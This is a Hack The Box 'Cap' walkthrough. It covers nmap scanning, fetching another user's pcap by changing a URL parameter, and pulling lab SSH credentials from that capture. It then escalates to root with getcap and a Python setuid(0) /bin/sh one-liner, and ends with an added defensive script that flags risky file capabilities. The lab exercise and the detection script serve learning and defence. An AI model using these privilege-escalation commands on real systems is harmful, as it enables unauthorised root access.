Today we come with another challenge from Hackthebox called Cap. This is an easy-level machine on which unencrypted traffic was being captured, and we analyze that traffic with Wireshark. So without wasting time, let's start the machine.
Level : Easy
Attacking Strategy
- Network Scanning
- Nmap
- Enumeration
- PCAP dump
- Analyze pcap file
- Extract credentials from pcap file
- Privilege Escalation
- Abusing capabilities
Walkthrough
IP Address : 10.10.10.245
We start with an nmap scan using the default -sC scripts and -sV version detection to grab service banners from the server. Nmap reveals several open ports and services on the target: port 21 FTP, port 22 SSH and port 80 HTTP.
nmap -sC -sV -p- 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:54 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Fri, 20 Aug 2021 16:22:48 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: OPTIONS, GET, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
|_http-server-header: gunicorn
On port 21 (FTP) anonymous login is not available and this vsftpd version is not directly exploitable, so we move on to port 80 and start enumeration. After some time we gather information from the profile page, such as the username “Nathan”.

Enumeration
The landing page has one more feature: it takes a traffic snapshot for analysis. We download one of these pcap files and start enumerating it for services or any other details. After some time we simply try to fetch the 0.pcap file by changing the URL parameter.

The 0.pcap file contains a lot of protocols, such as HTTP. The capture is long to read through, so we filter the packets according to what we need. After some time we find the credentials, so we simply SSH into the server with them and it works.

Privilege Escalation
With these credentials we SSH into the server. Now it is time to get root, so we start with manual enumeration: checking the passwd file, SUID bits, etc.
Username : nathan
Password : Buck3tH4TF0RM3!
Username and password recovered from the PCAP file

After some time we learn that we can abuse file capabilities, i.e. we can use Python to do so; GTFOBins shows how to abuse the capabilities. After successful exploitation we get root and collect the flags.
getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
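As an added defensive check (not part of the original writeup), the script below parses getcap output and flags binaries whose permitted set carries a root-equivalent capability, such as the cap_setuid on Python abused above. The sample getcap output and its paths are constructed for illustration.

```python
import re

# File capabilities that, when granted to an interpreter or any binary an unprivileged
# user can run, are effectively equivalent to root (cap_setuid is the one used on Cap).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
    "cap_setfcap", "cap_sys_rawio",
}

# Constructed sample of `getcap -r / 2>/dev/null` output (not captured from the machine).
# It mixes the older libcap style "path = caps+flags" with the newer "path caps=flags".
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/opt/legacy/helper = cap_setuid+i
"""

CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)([+=-][eip]*)$")


def parse_getcap(output):
    """Yield (path, {capability: flag letters}) for every line of getcap output."""
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ")          # drop the " = " separator of the old format
        caps = {}
        for clause in rest.split():       # e.g. "cap_a,cap_b+eip" or "cap_a=ep"
            m = CLAUSE_RE.match(clause)
            if m:
                for name in m.group(1).split(","):
                    caps[name] = m.group(2)[1:]   # flag letters without the + / = / -
        yield path, caps


def find_root_equivalent(output):
    """Return [(path, [caps])] for binaries whose permitted set holds a root-equivalent cap."""
    findings = []
    for path, caps in parse_getcap(output):
        risky = sorted(c for c, flags in caps.items() if c in ROOT_EQUIVALENT and "p" in flags)
        if risky:
            findings.append((path, risky))
    return findings


if __name__ == "__main__":
    for path, risky in find_root_equivalent(SAMPLE_GETCAP):
        # `setcap -r` strips every file capability; re-grant only what the binary truly needs.
        print(f"{path}: {','.join(risky)}  -> fix: setcap -r {path}")
```

The inheritable-only entry (+i) is deliberately not flagged, since a capability must be in the permitted set before a process can raise it.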
